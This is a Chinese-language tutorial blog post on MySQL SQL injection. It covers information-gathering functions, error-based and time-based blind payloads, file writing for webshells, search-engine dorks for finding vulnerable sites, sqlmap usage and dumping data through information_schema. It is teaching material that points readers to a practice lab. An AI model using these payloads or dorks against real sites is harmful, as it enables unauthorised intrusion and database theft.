SQL注入进阶篇(一)

目录

前言

MySQL注入函数

常用函数

字符串函数

读写文件

 高级函数

运算符

算术运算符

比较运算符

 逻辑运算符

 注入语句样例分析

 SQL注入的流程

寻找注入点

 注入方式

拿数据库总结

MySQL的内置库

information_schema

总结


前言

对于sql注入,大家肯定不会陌生,就是我们构造一些包含恶意的SQL语句在可以跟数据库做交互的地方运行,从而达到目的。当然,我们也接触了各种不同的数据库,如MySQL、MSSQL之类的,但最为常见的应该就是MySQL这一类的数据库了,接下来,我们来更深入的了解SQL注入,让你的技术在提升一个水平。接下来会

MySQL注入函数

先了解常用的那些函数,在对这些函数进行一个认识。

常用函数

MySQL有许多内置的函数,这些函数通常可以让我们更快捷的得到想要的信息

select SYSTEM_USER();#系统用户名
select USER();#用户名
SELECT CURRENT_USER();#当前用户名
SELECT SESSION_USER();#链接数据库的用户名
SELECT DATABASE();#数据库名
SELECT VERSION();#数据库版本
select @@datadir;#数据库路径
SELECT @@basedir;#数据库安装路径
SELECT @@version_compile_os;#操作系统
#count();返回执行结果数量
SELECT COUNT(User) from mysql.user;

字符串函数

#concat() 没有分割的链接字符串
SELECT CONCAT(username,`password`) FROM users;
#CONCAT_WS() 含有分分隔符地连接字符串,需要指定连接符,也可以使用16进制的ASCII码
SELECT CONCAT_WS(0x7e,username,`password`) FROM users
#GROUP_CONCAT() 连接每一个组的所有字符串,并以都好分割每一条数据
SELECT GROUP_CONCAT(username) from users;

#ascii() 字符串的ASCII代码值
#ord() 返回字符串第一个字符的ASCII值
#mid()返回一个字符串的一部分
#substr()返回一个字符串的一部分,功能基本一致
#length()返回字符串的长度

SELECT MID('字符串‘,起始位置,截取长度)

#left() 返回字符串最左面的几个字符
#floor() 返回小于或等于x的最大整数
#rand() 返回0和1之间的一个随机数

读写文件

#load_file()读取本地文件
#into outfile()写文件
#注意secure_file_priv的值
SELECT 'mysql' INTO OUTFILE '/tmp/mysql
SELECT LOAD_FILE('/tmp/mysql')
#可利用此函数写一句话,读取配置文件

SELECT … INTO OUTFILE 导出数据到文件,这里稍微提以下,就是这个写入shell的三个条件

  • 用户具有FILE权限

  • secure_file_priv如果非空,则只能在对应的目录下写入文件

  • 输出不能是一个已存在的文件

查询secure_file_priv值的语句为show variables like '%secure%';

SQL注入进阶篇(一)_第1张图片

 当secure_file_priv=null时,说明当前不可写入,如果需要更改只需要在my.ini文件中更改值为=“ ”即可。

 高级函数

#EXTRACTVALUE (XML_document, XPath_string); 从目标XML中返回包含所查询值的字符串。
#XML_document是String格式,为XML文档对象的名称,文中为Doc
#XPath_string (Xpath格式的字符串)
           
#UpdateXml(XML_document, XPath_string, new_value),这个函数有3个参数
#XML_document是String格式,为XML文档对象的名称,文中为Doc
#XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
#new_value,String格式,替换查找到的符合条件的数据
#作用:从目标XML中返回包含所查询的字符串

#这两个函数功能类似,一个是查询,一个是更新。由于要求第二个参数为xpath格式字符串,如果输入的不是该格式,就会引起报错,可进行报错注入

#sleep() 让此语句运行N秒钟
#if(),需要3个值,第一个值为一个表达式,如果表达式结果为真返回第二个参数,结果为假返回第三个参数

#char() 返回整数ASCII代码字符代表的字符串
#strcmp() 比较字符串内容,实际上比较的为字符串对应的ASCII码,结果为-1、0、1
#ifnull() 两个参数,第一个参数不为null直接返回,否则返回第二个参数
#exp() 返回e的x次方

运算符

算术运算符

+、-、*、/ 这几个不用解释,%:求余,DIV:除法运算,同’”/“,MOD:求余运算,同”%”。

比较运算符

‘>’、’<’、’=’、’>=’、’<=’和数学上同理 

#!=或者<>:不等于
#is null :为空
#is not null:不为空

#BETWEEN AND :在……之间
#IN:包含
#Not IN :不包含
#LIKE :模式匹配
select id,username from users where username like '%d%';
#这里的'%'代表任意匹配
#NOT LIKE :和上个句子类似

#REGEXP :正则表达式

 逻辑运算符

&&或AND、||或OR、!或NOT、XOR分别代表与、或、非、异或

在SQL注入的过程中,使用逻辑运算符判断语句是否被执行,从而判断是否有注入点

(一个小tips)

 我们举一个最熟知的例子,就是万能密码,我们都知道构造一个逻辑值,就能在过滤不严格的情况下直接无需密码的登入。这个是怎么做到的呢?下面来简单的示范一下语句的执行过程。

SQL注入进阶篇(一)_第2张图片

 注入语句样例分析

SELECT USER() REGEXP '^ro'
#匹配正则表达式
SELECT ASCII(SUBSTR((select user()),1,1))=114
#执行select user()查询用户,使用subst去结果的第一个字符,转换为ASCII码和114比较是否相等,r的ASCII码是114

SELECT if(ASCII(SUBSTR((SELECT USER()),1,1))=114,0,SLEEP(5))
#和上面的语句类似,只不过加上了IF语句,如果相等返回0,否则延迟5秒

SELECT ASCII( SUBSTR(( SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE () LIMIT 0, 1 ),1,1 ))=9
#" SELECT table_name FROM information_schema.`TABLES` WHERE TABLE_schema = DATABASE() LIMIT 0,1"这条语句利用元数据获取当前数据的第一个表,使用SUBstr进行切割,获取第一个字符,进行ASCII码转换,比较结果

select updatexml(1,concat(0x7e,(select @@version),0x7e),1);
#由于第二个参数不是XPath格式的数据类型,而是进行的版本查询,使用cocat进行了拼接,mysql给出了报错的语法错

 SQL注入的流程

寻找注入点

这里我们就直接干脆的利用语法搜寻,更容易展示:

  • 无特定目标:使用搜索引擎inurl:.php?id=1

  • 有特定目标:使用搜索引擎inurl:.php?id= site:target.com

  • 工具:spider,爬虫,对搜索引擎和目标网站的链接进行爬取

SQL注入进阶篇(一)_第3张图片 

 注入方式

  • 手工识别:加 ‘ 引发报错,使用and语句判断语句是否被执行

    and 1=1 /and 1=2           and '1'='1 /and '1'='2                                     and 1 like 1 / and 1 kike 2

  • 工具识别             

sqlmap -m filename(filename中保存检测目标)

sqlmap --crawl(sqlmap对目标网站进行爬去,然后依次进行测试)

  • 高级识别

  • BurpSuite+SQLmap

    BurpSuite拦截浏览器访问提交的数据,使用扩展插件,直接调用Sqlmap进行测试

  • sqlmap -level增加测试级别,对header中相关参数也进行测试,比如cookie等参数

  • sqlmap -r filename,filename中为网站请求数据,必输GET请求,POST请求

  • 扩展识别广度和深度

  • 利用工具提高识别效率

拿数据库总结

  • 信息搜集阶段:利用内置函数搜集信息

  • 数据获取阶段:通过语句查询找到关键的内容,或通过暴力破解(比如遍历ASCII码来猜测)

  • 提权阶段:利用本身数据库的权限,或读写文件提权

MySQL的内置库

什么是内置库?

就是MySQL中本身就会自带的数据库,里面存储这各种信息、数据。在MySQL>=5.7的时候,就会有4个默认的内置库。

  • mysql:保存账户信息,权限信息,存储过程,event,时区等信息

  • sys:包含一系列的存储过程,自定义函数以及视图来帮助我们快速的了解系统元数据信息(元数据:关于数据的数据)

  • performance_schema :用于搜集数据库服务器性能参数

  • information_schema:提供访问数据库元数据的方式,保存着关于Mysql服务器所维护的所有其他数据库信息。

MySQL注入的核心原理:通过MySQL内置的information_schema库可以了解整个Mysql的运行情况,查看到数据库的所有数据信息。我们主要就是构造函数,调用运行这个库的相关函数功能。

information_schema

这里就简单的阐述整理一下该库的功能,以及能做那些事。

information_schema可以理解成信息信息数据库,保存着数据库的数据。

  • - SCHEMATA 表:提供了当前mysql实例中所有数据库的信息。
  •  show databases的结果取之此表。
  • - TABLES 表:提供了关于数据库中的表的信息。详细表述了某个表属于哪个
  • schema,表类型,表引擎,创建时间等信息。
  •  show tables from schemaname的结果取之此表。
  • - COLUMNS 表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。

例如:show columns from schemaname.tablename的结果取之此表。

总结

在我们不知道任何信息的前提下,可以整理以下思路步骤,通过information_schema中内置的函数来引出有用的信息

SELECT schema_name from information_schema.SCHEMATA #查库
SELECT TABLE_name from information_schema.`TABLES` WHERE TABLE_schema='库名' #查表
SELECT COLUMN_NAME FROM information_schema.`COLUMNS` where table_name='表名' #查列
SELECT 列名 FROM 库名.表名 #查数据

希望各位能有一些收获,这边也推荐一个sql练习的靶场,很好用!

sqli-llabs在GitHub上面就有。

你可能感兴趣的:(渗透,信息安全,漏洞,sql,数据库,mysql,web安全,安全)